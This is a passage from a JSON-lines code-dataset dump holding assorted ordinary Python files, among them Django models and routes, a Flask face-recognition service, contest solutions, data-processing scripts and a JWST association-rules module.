main()\n","sub_path":"possel/irc.py","file_name":"irc.py","file_ext":"py","file_size_in_byte":19583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"512996500","text":"from django.db import models\nfrom autoslug import AutoSlugField\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50)\n\n\nclass Post(models.Model):\n title = models.CharField(max_length=200)\n text = models.TextField()\n\n published = models.BooleanField(default=False)\n publish_date = models.DateTimeField(auto_now_add=True, null=True)\n\n slug = AutoSlugField(populate_from='title',always_update=True)\n tags = models.ManyToManyField(Tag, related_name=\"posts\")\n\n class Meta:\n ordering = [\"-publish_date\"]","sub_path":"syte/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48872768","text":"import numpy as np\nimport queue\nimport heapq\nimport math\n\nprint(\"hello\")\n\nR = 10000\nC = 10000\nF = 1000\nN = 10000\nB = 10000\nT = 1e9\nstart = []\nfinish = []\nstime = []\nftime = []\nrtime = []\nstartx = 0\nstarty = 0\nendx = 0\nendy = 0\nstartxx = 0\nstartyy = 0\nendxx = 0\nendyy = 0\nstartdx = 0\nstartdy = 0\nenddx = 0\nenddy = 0\n\n#fnames = [\"input.txt\", \"output.txt\"]\n#fnames = [\"b_should_be_easy.in\", \"b_should_be_easy.out\"]\n#fnames = [\"c_no_hurry.in\", \"c_no_hurry.out\"]\nfnames = [\"d_metropolis.in\", \"d_metropolis.out\"]\n#fnames = [\"e_high_bonus.in\", \"e_high_bonus.out\"]\n\ndef distance(a1, b1, a2, b2):\n return abs(a1-a2) + abs(b1-b2)\n\ndef badness(a, b):\n da = abs(a - startx) / startdx\n da = math.sqrt(4+da*da) * startdx\n db = abs(b - starty) / startdy\n db = math.sqrt(4+db*db) * startdy\n return da+db\n\ndef doride(car, ride): # (eff, car, pts)\n r,c,t = car\n t2 = t + distance(r,c, start[ride][0], start[ride][1])\n if t2 + rtime[ride] > ftime[ride]:\n return (-1,0,0)\n elif t2 <= stime[ride]:\n pts = B + rtime[ride]\n endtime = stime[ride] + rtime[ride]\n eff = pts / (endtime - t)\n bad = badness(finish[ride][0], finish[ride][1])\n bad = min(bad, T-endtime)\n return (endtime-pts+B-rtime[ride]/4000, (finish[ride][0], finish[ride][1], endtime), pts)\n else:\n pts = rtime[ride]\n endtime = t2 + rtime[ride]\n eff = pts / (endtime - t)\n bad = badness(finish[ride][0], finish[ride][1])\n bad = min(bad, T-endtime)\n return (endtime-pts+B-rtime[ride]/4000, (finish[ride][0], finish[ride][1], endtime), pts)\n\nwith open(fnames[0], 'r') as f:\n line = f.readline().split(' ')\n R = int(line[0])\n C = int(line[1])\n F = int(line[2])\n N = int(line[3])\n B = int(line[4])\n T = int(line[5])\n stime = [0]*N\n ftime = [0]*N\n rtime = [0]*N\n for i in range(N):\n line = f.readline().split(' ')\n s1 = int(line[0])\n s2 = int(line[1])\n f1 = int(line[2])\n f2 = int(line[3])\n start.append((s1, s2))\n finish.append((f1, f2))\n stime[i] = int(line[4])\n ftime[i] = int(line[5])\n rtime[i] = distance(s1,s2, f1,f2)\n startx += s1\n starty += s2\n startxx += s1*s1\n startyy += s2*s2\n endx += f1\n endy += f2\n endxx += f1*f1\n endyy += f2*f2\n \nprint(\"done read\")\n\nstartx /= N\nstarty /= N\nstartxx /= N\nstartyy /= N\nendx /= N\nendy /= N\nendxx /= N\nendyy /= N\nstartdx = math.sqrt(startxx - startx*startx)\nstartdy = math.sqrt(startyy - starty*starty)\nenddx = math.sqrt(endxx - endx*endx)\nenddy = math.sqrt(endyy - endy*endy)\n\nprint(startx, starty, startdx, startdy)\n\ncurcars = [0]*F\nfor i in range(F):\n curcars[i] = (0,0,0) # r, c, time\nridedone = [0]*N\n\nQ = []\nfor i in range(F):\n for j in range(N):\n eff, car, pts = doride(curcars[i], j)\n #print(eff, car)\n if eff != -1:\n heapq.heappush(Q, (eff, (i, j, car, curcars[i][2], pts))) # (-eff, (F, N, carstate, lastendtime, pts))\n\nans = []\nfor i in range(F):\n ans.append([])\ntotalscore = 0\n\ncounter = 0\nprint(\"Q %d\" % len(Q))\nwhile Q:\n counter += 1\n if counter % 500000 == 0:\n print(\"Q %d\" % len(Q))\n eff, data = heapq.heappop(Q)\n #print(eff, data)\n i,j,car,endtime,pts = data\n if endtime == curcars[i][2] and not ridedone[j]:\n ans[i].append(j)\n curcars[i] = car\n ridedone[j] = 1\n totalscore += pts\n elif not ridedone[j]:\n eff, car, pts = doride(curcars[i], j)\n if eff >= 0:\n heapq.heappush(Q, (eff, (i, j, car, curcars[i][2], pts))) # (-eff, (F, N, carstate, lastendtime))\n\n# print(ans)\nprint(totalscore)\n\nwith open(fnames[1], 'w') as f:\n for i in range(F):\n f.write(\"%d \" % len(ans[i]))\n for j in range(len(ans[i])):\n f.write(\"%d \" % ans[i][j])\n f.write(\"\\n\")\n \n","sub_path":"solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"187631587","text":"import face_recognition\nimport base64\nimport base64\nimport io\nimport numpy as np\nfrom io import BytesIO\nfrom PIL import Image, ImageDraw\n\nfrom flask import Flask, jsonify, request, json\napp = Flask(__name__)\n\n@app.route('/getencoding', methods=['POST'])\ndef getEncoding():\n data = request.files['image']\n camImage = face_recognition.load_image_file(data)\n camera_image_encoding = face_recognition.face_encodings(camImage)[0]\n\n jObj = {}\n jObj['encoding'] = camera_image_encoding.tolist()\n\n response = app.response_class(\n response=json.dumps(jObj),\n status=200,\n mimetype='application/json'\n )\n return response\n \n@app.route('/compareimages', methods=['POST'])\ndef compareimages():\n data = request.get_json(force=True)\n first_encoding = np.array(data['first_encoding'])\n second_encoding = np.array(data['second_encoding'])\n results = face_recognition.compare_faces([first_encoding], second_encoding, tolerance=0.4)\n print(results[0])\n\n rObj = {'match': str(results[0]).lower()}\n data_json = json.dumps(rObj)\n\n print(data_json)\n\n response = app.response_class(\n response=json.dumps(rObj),\n status=200,\n mimetype='application/json'\n )\n\n return response\n\n@app.route('/facialreg', methods=['POST'])\ndef facialreg():\n data = request.get_json(force=True)\n uuid = data[\"uuid\"]\n sampleEncodeImage = data[\"sampleimage\"].replace(\"\\n\",\"\")\n cameraEncodeImage = data[\"camimage\"].replace(\"\\n\",\"\")\n\n sampleImage = face_recognition.load_image_file(io.BytesIO(base64.b64decode(sampleEncodeImage)))\n sample_image_encoding = face_recognition.face_encodings(sampleImage)[0]\n\n camImage = face_recognition.load_image_file(io.BytesIO(base64.b64decode(cameraEncodeImage)))\n camera_image_encoding = face_recognition.face_encodings(camImage)[0]\n\n #compare user taken face image to sample image\n #tolerence is how strict\n #lower the stricter\n #current sweet spot = 0.5, changed from 0.4\n results = face_recognition.compare_faces([sample_image_encoding], camera_image_encoding,tolerance=0.5) \n\n #true = match\n #false = not match\n if True in results:\n regStatus = str(\"Match\")\n \n # Find all the faces and face encodings in the camera image\n cam_face_locations = face_recognition.face_locations(camImage)\n cam_face_encodings = face_recognition.face_encodings(camImage, cam_face_locations)\n\n # Convert the image to a PIL-format image so that we can draw on top of it with the Pillow library\n pil_image = Image.fromarray(camImage)\n # Create a Pillow ImageDraw Draw instance to draw with\n draw = ImageDraw.Draw(pil_image)\n\n # Loop through each face found in the unknown image\n for (top, right, bottom, left), face_encoding in zip(cam_face_locations, cam_face_encodings):\n # Draw a box around the face using the Pillow module\n draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))\n\n # Draw a label with a name below the face\n text_width, text_height = draw.textsize(uuid) \n draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))\n draw.text((left + 6, bottom - text_height - 5), uuid, fill=(255, 255, 255, 255))\n\n # Remove the drawing library from memory as per the Pillow docs\n del draw\n\n #convert drawn pil image to base64 \n buffered = BytesIO()\n pil_image.save(buffered, format=\"JPEG\")\n faceDetectBase64 = str(base64.b64encode(buffered.getvalue()))\n faceDetectBase64 = faceDetectBase64.replace(\"b'\",\"\")\n faceDetectBase64 = faceDetectBase64.replace(\"'\",\"\")\n\n else:\n regStatus = str(\"Do Not Match\")\n\n # Find all the faces and face encodings in the camera image\n cam_face_locations = face_recognition.face_locations(camImage)\n cam_face_encodings = face_recognition.face_encodings(camImage, cam_face_locations)\n\n # Convert the image to a PIL-format image so that we can draw on top of it with the Pillow library\n pil_image = Image.fromarray(camImage)\n # Create a Pillow ImageDraw Draw instance to draw with\n draw = ImageDraw.Draw(pil_image)\n\n # Loop through each face found in the unknown image\n for (top, right, bottom, left), face_encoding in zip(cam_face_locations, cam_face_encodings):\n # Draw a box around the face using the Pillow module\n draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))\n\n # Draw a label with a name below the face\n text_width, text_height = draw.textsize(\"unknown\") \n draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))\n draw.text((left + 6, bottom - text_height - 5), \"unknown\", fill=(255, 255, 255, 255))\n\n # Remove the drawing library from memory as per the Pillow docs\n del draw\n\n #convert drawn pil image to base64\n buffered = BytesIO()\n pil_image.save(buffered, format=\"JPEG\")\n faceDetectBase64 = str(base64.b64encode(buffered.getvalue()))\n faceDetectBase64 = faceDetectBase64.replace(\"b'\",\"\")\n faceDetectBase64 = faceDetectBase64.replace(\"'\",\"\")\n \n return jsonify(\n status = regStatus,\n facedetect = faceDetectBase64\n )\n\nif __name__=='__main__':\n app.run(debug=True, port=5000)","sub_path":"FACIALRECOGNITION/FrWebService.py","file_name":"FrWebService.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473172475","text":"\"\"\"flashfocus command line interface.\"\"\"\nimport logging\nfrom logging import info as log\nimport os\n\nimport click\nfrom tendo import singleton\n\nfrom flashfocus.flasher import Flasher\n\n# Set LOGLEVEL environment variable to DEBUG or WARNING to change logging\n# verbosity.\nlogging.basicConfig(level=os.environ.get('LOGLEVEL', 'INFO'))\n\n\ndef validate_positive_decimal(ctx, param, value):\n \"\"\"Validate the opacity command line argument.\"\"\"\n if not 0 <= value <= 1:\n raise ValueError(\n \"%s parameter not in valid range, should be between 0 and 1\", param)\n return value\n\n\ndef format_time(ctx, param, value):\n \"\"\"Validate the time command line argument and convert to seconds.\"\"\"\n validate_positive_int(ctx, param, value)\n return value / 1000\n\n\ndef validate_positive_int(ctx, param, value):\n \"\"\"Check that a command line argument is a positive integer.\"\"\"\n if value < 1:\n raise ValueError(\"%s parameter cannot be < 1\", param)\n if int(value) != value:\n raise ValueError(\"%s parameter must be an int, not a float\", param)\n return value\n\n\n@click.command()\n@click.option('--opacity', '-o',\n default=0.8,\n callback=validate_positive_decimal,\n help='Opacity of the window during a flash.')\n@click.option('--time', '-t',\n default=500,\n callback=format_time,\n help='Flash time interval (in milliseconds).')\n@click.option('--simple', '-s', is_flag=True,\n help='Don\\'t animate flashes. Setting this parameter improves '\n 'performance but causes rougher opacity transitions.')\n@click.option('--ntimepoints', '-n',\n default=10,\n callback=validate_positive_int,\n help='Number of timepoints in the flash animation. Higher values '\n 'will lead to smoother animations with the cost of '\n 'increased X server requests. Ignored if --simple is set.')\n@click.option('--debug', '-d', is_flag=True, help='Run in debug mode.')\ndef cli(opacity, time, ntimepoints, simple, debug):\n \"\"\"Simple focus animations for tiling window managers.\"\"\"\n params = locals()\n single_instance_lock = singleton.SingleInstance()\n log('Initializing with parameters:')\n log('%s', params)\n flasher = Flasher(opacity, time, ntimepoints, simple)\n if debug:\n log('Flasher attributes: %s', flasher.__dict__)\n else:\n flasher.monitor_focus()\n","sub_path":"flashfocus/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230216088","text":"class Status:\r\n\tdef __init__(self):\r\n\t\tself.x = True\r\n\t\tself.o = True\r\n\t\r\n\tdef check(self, c):\r\n\t\tif c == '.':\r\n\t\t\tself.o = False\r\n\t\t\tself.x = False\r\n\t\telif c == 'X':\r\n\t\t\tself.o = False\r\n\t\telif c == 'O':\r\n\t\t\tself.x = False\r\n\r\ndef solve_game(inp, out):\r\n\tboard = list()\r\n\tfor i in range(4):\r\n\t\tboard.append(inp.readline())\r\n\tincomplete = False\r\n\tfor i in range(4):\r\n\t\tr = Status()\r\n\t\tc = Status()\r\n\t\tfor j in range(4):\r\n\t\t\tif board[i][j] == '.':\r\n\t\t\t\tincomplete = True\r\n\t\t\tr.check(board[i][j])\r\n\t\t\tc.check(board[j][i])\r\n\t\tif r.x or c.x:\r\n\t\t\treturn \"X won\"\r\n\t\tif r.o or c.o:\r\n\t\t\treturn \"O won\"\r\n\td1 = Status()\r\n\td2 = Status()\r\n\tfor i in range(4):\r\n\t\td1.check(board[i][i])\r\n\t\td2.check(board[i][3-i])\r\n\tif d1.x or d2.x:\r\n\t\treturn \"X won\"\r\n\tif d1.o or d2.o:\r\n\t\treturn \"O won\"\r\n\tif incomplete:\r\n\t\treturn \"Game has not completed\"\r\n\telse:\r\n\t\treturn \"Draw\"\r\n\r\ndef solve(inp, out):\r\n\tn = int(inp.readline())\r\n\tfor i in xrange(1,n+1):\r\n\t\tst = solve_game(inp, out)\r\n\t\tout.write(\"Case #%d: %s\\n\" % (i, st))\r\n\t\tinp.readline()\r\n\r\ndef main():\r\n\twith open(\"A-large.in\", \"rt\") as inp:\r\n\t\twith open(\"output.txt\", \"wt\") as out:\r\n\t\t\tsolve(inp, out)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"solutions_2453486_1/Python/infsega/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"314456298","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport Model\r\nimport pywt\r\ndef read_data(filename):\r\n data = pd.read_csv(filename, header=None)\r\n X = data.values\r\n X = X.reshape([len(X)*5, 1])\r\n scaler = MinMaxScaler()\r\n X = scaler.fit_transform(X)\r\n return X\r\ndef read_label(filename):\r\n label = pd.read_csv(filename, header = None)\r\n y = label.values\r\n return y\r\ndef get_data(bit_rate, distance):\r\n i = 1\r\n X = []\r\n y = []\r\n num_file = 40\r\n while i < (num_file+1):\r\n X_path = 'Lorentz_dataset/%scm/%sk/%s000_250_%s.csv' % (distance, bit_rate, bit_rate, i)\r\n y_path = 'Lorentz_dataset/%scm/%sk/label_%s000_250_%s.csv' % (distance, bit_rate, bit_rate, i)\r\n X_t = read_data(X_path)\r\n y_t = read_label(y_path)\r\n X = np.append(X, X_t)\r\n y = np.append(y, y_t)\r\n i+=1\r\n X = X.reshape(num_file*250, 5)\r\n y = y.reshape(-1)\r\n return X, y\r\ndef get_data_related_bit(bit_rate, distance):\r\n j = 1\r\n X = []\r\n y = []\r\n num_file = 40\r\n while j < (num_file+1):\r\n data_path = 'Lorentz_dataset/%scm/%sk/%s000_250_%s.csv' % (distance, bit_rate, bit_rate, j)\r\n y_path = 'Lorentz_dataset/%scm/%sk/label_%s000_250_%s.csv' % (distance, bit_rate, bit_rate, j)\r\n data_t = read_data(data_path)\r\n y_t = read_label(y_path)\r\n data_t = data_t.reshape([250, 5])\r\n y_t = y_t.reshape(-1)\r\n data = []\r\n for i in np.arange(len(data_t)):\r\n if i == 0:\r\n temp_1 = data_t[len(data_t)-2]\r\n temp_2 = data_t[len(data_t)-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[i+2]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n elif i == 1:\r\n temp_1 = data_t[len(data_t)-1]\r\n temp_2 = data_t[len(data_t)-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[i+2]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n elif i == len(data_t)-2:\r\n temp_1 = data_t[i-2]\r\n temp_2 = data_t[i-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[0]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n elif i == len(data_t)-1:\r\n temp_1 = data_t[i-2]\r\n temp_2 = data_t[i-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[0]\r\n temp_5 = data_t[1]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n else:\r\n temp_1 = data_t[i-2]\r\n temp_2 = data_t[i-1]\r\n temp_3 = data_t[i]\r\n temp_4 = data_t[i+1]\r\n temp_5 = data_t[i+2]\r\n temp_6 = np.hstack([temp_1, temp_2, temp_3, temp_4, temp_5])\r\n data = np.append(data, temp_6)\r\n X = np.append(X, data)\r\n y = np.append(y, y_t)\r\n j+=1\r\n X = X.reshape(num_file*250, 25)\r\n return X, y\r\ndef CWT(X):\r\n cwt = []\r\n for i in X:\r\n coef, freqs = pywt.cwt(i, np.arange(1, 4), 'mexh')\r\n cwt = np.append(cwt, coef)\r\n cwt = cwt.reshape(10000, X.shape[0]*3)\r\n return cwt\r\ndef exe(mode, bit_rate, distance):\r\n if mode == \"related_bit\":\r\n X, y = get_data_related_bit(bit_rate, distance)\r\n elif mode == \"DAE\":\r\n X, y = get_data(bit_rate, distance)\r\n m = Model.DAE(bit_rate, X, y)\r\n X = m.correct()\r\n else:\r\n X, y = get_data(bit_rate, distance)\r\n filename_1 = \"Lorentz_dataset/Lorentz_%scm_%sk_related_bit.csv\" % (distance, bit_rate)\r\n filename_2 = \"Lorentz_dataset/Lorentz_label_%scm_%sk.csv\" % (distance, bit_rate)\r\n np.savetxt(filename_1, X, delimiter=\",\")\r\n np.savetxt(filename_2, y, delimiter=\",\")\r\n return X, y","sub_path":"Getdata.py","file_name":"Getdata.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"569741930","text":"import logging\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom inspect import getfile, getmembers, isclass, ismodule\nfrom itertools import count\nimport json\nimport jsonschema\nfrom nose.tools import nottest\nfrom os.path import abspath, basename, dirname, expanduser, expandvars, join\nimport re\nimport sys\n\nfrom astropy.extern import six\nfrom numpy.ma import masked\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# Library files\n_ASN_RULE = 'association_rules.py'\n\n# User-level association definitions start with...\nUSER_ASN = 'Asn_'\n\n# Timestamp template\n_TIMESTAMP_TEMPLATE = '%Y%m%dT%H%M%S'\n\n\nclass AssociationError(Exception):\n \"\"\"Basic failure of an association\"\"\"\n\n\nclass AssociationRegistry(dict):\n \"\"\"The available assocations\n\n Parameters\n ----------\n definition_files: [str,]\n The files to find the association definitions in.\n\n include_default: bool\n True to include the default definitions.\n\n global_constraints: dict\n Constraints to be added to each rule.\n \"\"\"\n\n def __init__(self,\n definition_files=None,\n include_default=True,\n global_constraints=None):\n super(AssociationRegistry, self).__init__()\n\n # Setup constraints that are to be applied\n # to every rule.\n if global_constraints is None:\n global_constraints = {}\n\n if definition_files is None:\n definition_files = []\n if include_default:\n definition_files.insert(0, libpath(_ASN_RULE))\n if len(definition_files) <= 0:\n raise AssociationError('No rule definition files specified.')\n Utility = type('Utility', (object,), {})\n for fname in definition_files:\n logger.debug('Import rules files \"{}\"'.format(fname))\n module = import_from_file(fname)\n logger.debug('Module=\"{}\"'.format(module))\n for class_name, class_object in get_classes(module):\n logger.debug('class_name=\"{}\"'.format(class_name))\n if class_name.startswith(USER_ASN):\n class_object.GLOBAL_CONSTRAINTS = global_constraints\n self.__setitem__(class_name, class_object)\n if class_name == 'Utility':\n Utility = type('Utility', (class_object, Utility), {})\n self.Utility = Utility\n\n def match(self, member, timestamp=None, ignore=None):\n \"\"\"See if member belongs to any of the association defined.\n\n Parameters\n ----------\n member: dict\n A member, like from a Pool, to find assocations for.\n\n timestamp: str\n If specified, a string appened to association names.\n Generated if not specified.\n\n ignore: list\n A list of associations to ignore when looking for a match.\n Intended to ensure that already created associations\n are not re-created.\n\n Returns\n -------\n [association,]\n A list of associations this member belongs to.\n \"\"\"\n logger.debug('Starting...')\n associations = []\n for name, rule in self.items():\n if rule not in ignore:\n try:\n associations.append(rule(member, timestamp))\n except AssociationError as error:\n logger.debug('Rule \"{}\" not matched'.format(name))\n logger.debug('Error=\"{}\"'.format(error))\n continue\n if len(associations) == 0:\n raise AssociationError('Member does not match any rules.')\n return associations\n\n\nclass Association(object):\n \"\"\"An Association\n\n Parameters\n ----------\n member: dict\n The member to initialize the association with.\n\n timestamp: str\n Timestamp to use in the name of this association. Should conform\n to the datetime.strftime format '%Y%m%dT%M%H%S'. If None, class\n instantiation will create this string using current time.\n\n Raises\n ------\n AssociationError\n If a member doesn't match any of the registered associations.\n\n Attributes\n ----------\n meta: dict\n Information about the association.\n\n data: dict\n The association. The format of this data structure\n is determined by the individual assocations and, if\n defined, valided against their specified schema.\n\n schema_file: str\n The name of the output schema that an association\n must adhere to.\n \"\"\"\n\n # Default force a constraint to use first value.\n DEFAULT_FORCE_UNIQUE = False\n\n # Default require that the constraint exists or otherwise\n # can be explicitly checked.\n DEFAULT_REQUIRE_CONSTRAINT = True\n\n # Global constraints\n GLOBAL_CONSTRAINTS = {}\n\n # Associations of the same type are sequenced.\n _sequence = count(1)\n\n def __init__(self, member, timestamp=None):\n\n self.add_constraints(deepcopy(self.GLOBAL_CONSTRAINTS))\n self.test_and_set_constraints(member)\n\n # Member belongs to us!\n # Continue initialization.\n self.sequence = six.advance_iterator(self._sequence)\n if timestamp is not None:\n self.timestamp = timestamp\n else:\n self.timestamp = make_timestamp()\n self.meta = {}\n self.data = {\n 'asn_type': 'None',\n 'asn_rule': self.__class__.__name__,\n 'creation_time': self.timestamp\n }\n\n # Peform further initializations before actually\n # adding the member to this association.\n self._init_hook(member)\n\n self.add(member, check_constraints=False)\n\n @property\n def asn_name(self):\n return 'unamed_association'\n\n def to_json(self):\n \"\"\"Create JSON representation.\n\n Returns\n -------\n (name, str):\n Tuple where the first item is the suggested\n base name for the JSON file.\n Second item is the string containing the JSON serialization.\n \"\"\"\n\n # Validate\n schema_path = libpath(self.schema_file)\n with open(schema_path, 'r') as schema_file:\n adb_schema = json.load(schema_file)\n jsonschema.validate(self.data, adb_schema)\n\n return (\n self.asn_name,\n json.dumps(self.data, indent=4, separators=(',', ': '))\n )\n\n def add(self, member, check_constraints=True):\n \"\"\"Add the member to the association\n\n Parameters\n ----------\n member: dict\n The member to add.\n\n check_constraints: bool\n If True, see if the member should belong to this association.\n If False, just add it.\n \"\"\"\n if check_constraints:\n self.test_and_set_constraints(member)\n\n self._add(member)\n\n @nottest\n def test_and_set_constraints(self, member):\n \"\"\"Test whether the given dictionaries match parameters for\n for this association\n\n Parameters\n ----------\n member: dict\n The parameters to check/set for this association.\n This can be a list of dictionaries.\n\n Raises\n ------\n AssociationError\n If a match fails.\n\n Notes\n -----\n If a constraint is present, but does not have a value,\n that constraint is set, and, by definition, matches.\n \"\"\"\n for constraint, conditions in self.constraints.items():\n try:\n input, value = getattr_from_list(member, conditions['inputs'])\n except KeyError:\n if conditions.get('required', self.DEFAULT_REQUIRE_CONSTRAINT):\n raise AssociationError(\n 'Constraint {} not present in member.'.format(constraint)\n )\n else:\n conditions['value'] = 'Constraint not present and ignored'\n continue\n if conditions['value'] is not None:\n if not meets_conditions(\n value, conditions['value']\n ):\n raise AssociationError(\n 'Constraint {} does not match association.'.format(constraint)\n )\n if conditions['value'] is None or \\\n conditions.get('force_unique', self.DEFAULT_FORCE_UNIQUE):\n logger.debug('Input=\"{}\" Value=\"{}\"'.format(input, value))\n conditions['value'] = re.escape(value)\n conditions['input'] = [input]\n conditions['force_unique'] = False\n\n def add_constraints(self, new_constraints):\n \"\"\"Add a set of constraints to the current constraints.\"\"\"\n\n try:\n constraints = self.constraints\n except AttributeError:\n constraints = {}\n self.constraints = constraints\n for constraint, value in six.iteritems(new_constraints):\n constraints[constraint] = constraints.get(constraint, value)\n\n def constraints_to_text(self):\n yield 'Constraints:'\n for c, p in self.constraints.items():\n yield ' {:s}: {}'.format(c, p['value'])\n\n @classmethod\n def reset_sequence(cls):\n cls._sequence = count(1)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-member-adding initialization.\"\"\"\n pass\n\n def _add(self, member):\n \"\"\"Add a member, association-specific\"\"\"\n raise NotImplementedError('Association._add must be implemented by a specific assocation rule.')\n\n\n# Utilities\ndef import_from_file(filename):\n path = expandvars(expanduser(filename))\n module_name = basename(path).split('.')[0]\n folder = dirname(path)\n sys.path.insert(0, folder)\n module = __import__(module_name)\n sys.path.pop(0)\n return module\n\n\ndef meets_conditions(value, conditions):\n \"\"\"Check whether value meets any of the provided conditions\n\n Parameters\n ----------\n values: str\n The value to be check with.\n\n condition: regex,\n Regular expressions to match against.\n\n Returns\n -------\n True if any condition is meant.\n \"\"\"\n\n if isinstance(conditions, six.string_types):\n conditions = [conditions]\n for condition in conditions:\n match = re.match(condition, value, flags=re.IGNORECASE)\n if match:\n return True\n return False\n\n\ndef libpath(filepath):\n '''Return the full path to the module library.'''\n\n return join(dirname(abspath(getfile(Association))),\n 'lib',\n filepath)\n\n\ndef make_timestamp():\n timestamp = datetime.utcnow().strftime(\n _TIMESTAMP_TEMPLATE\n )\n return timestamp\n\n\ndef getattr_from_list(adict, attributes):\n \"\"\"Retrieve value from dict using a list of attributes\n\n Parameters\n ----------\n adict: dict\n dict to retrieve from\n\n attributes: list\n List of attributes\n\n Returns\n -------\n (attribute, value)\n Returns the value and the attribute from\n which the value was taken.\n\n Raises\n ------\n KeyError\n None of the attributes are found in the dict.\n \"\"\"\n for attribute in attributes:\n try:\n result = adict[attribute]\n if result is masked:\n raise KeyError\n return attribute, result\n except KeyError:\n continue\n else:\n raise KeyError\n\n\ndef get_classes(module):\n \"\"\"Recursively get all classes in the module\"\"\"\n logger.debug('Called.')\n for class_name, class_object in getmembers(\n module,\n lambda o: isclass(o) or ismodule(o)\n ):\n logger.debug('name=\"{}\" object=\"{}\"'.format(class_name, class_object))\n if ismodule(class_object) and class_name.startswith('asn_'):\n for sub_name, sub_class in get_classes(class_object):\n yield sub_name, sub_class\n elif isclass(class_object):\n yield class_name, class_object\n","sub_path":"jwst/associations/association.py","file_name":"association.py","file_ext":"py","file_size_in_byte":12072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4630154","text":"import pandas as pd\nimport numpy as np\n\nimport time\n\ndef count_values(file, col, nb_lignes):\n start_time = time.time()\n \n print(\"Lecture du fichier...\")\n\n ch_size = 100000\n\n chunks = pd.read_csv(file, iterator=True, chunksize=ch_size, usecols=[col])\n values = pd.read_csv(file, nrows=1, usecols=[col])\n\n current_chunk = 0\n chunk_nb = np.ceil(nb_lignes/ch_size)\n\n print(\"Début du compte du nombre de valeurs différentes\")\n for chunk in chunks:\n values = values.append(chunk).drop_duplicates(col)\n current_chunk += 1;\n print(\"{} %\".format(np.round(current_chunk*100/chunk_nb, 2)))\n\n print(\"Temps d'exécution : {} seconds\".format(np.round(time.time()-start_time,2)))\n print(\"Nombre de valeurs : {}\".format(len(values)))\n return len(values),values\n\n","sub_path":"expedia/script/include/count_items.py","file_name":"count_items.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68941819","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\n url(r'^update_medias/(?P[^/]*)', views.update_medias_folder, name='update_medias_folder'),\n url(r'^update_medias', views.update_medias, name='update_medias'),\n url(r'^update_map/(?P[^/]*)', views.update_map, name='update_map'),\n url(r'^folders', views.Folders.as_view(), name='get_folders'),\n url(r'^folder/(?P[^/]*)', views.VideosByFolder.as_view(), name='get_video_by_folder'),\n url(r'', views.index, name='index'),\n]\n","sub_path":"app/front_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584708129","text":"## 实现strStr()\n\n##问题:当 needle 是空字符串时,我们应当返回什么值呢?\n# 返回0\n\n\n\n## 方法一:find()检测字符串中是否包含子字符串 str ,如果指定beg(开始)和end(结束)范围,\n# 则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。\n# class Solution:\n# def strStr(self, haystack, needle):\n#\n# return haystack.find(needle)\n\n\n\n## 方法二:暴力破解法\n# 从字符串haystack的每个位置开始,截取和needle相同长度的字串,与needle进行比较\nclass Solution:\n def strStr(self, haystack, needle):\n for i in range(len(haystack)):\n if haystack[i: i+len(needle)] == needle:\n return i\n return -1\n\n\n\n\na = Solution()\nprint(a.strStr(\"aaaaa\", \"\"))\n\n","sub_path":"ImplementstrStr_28.py","file_name":"ImplementstrStr_28.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542202625","text":"import argparse\nimport os\nimport sys\nimport subprocess\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n\ndef run_subprocess(args, cwd=None, capture_stdout=False, shell=False):\n if isinstance(args, str):\n raise ValueError(\"args 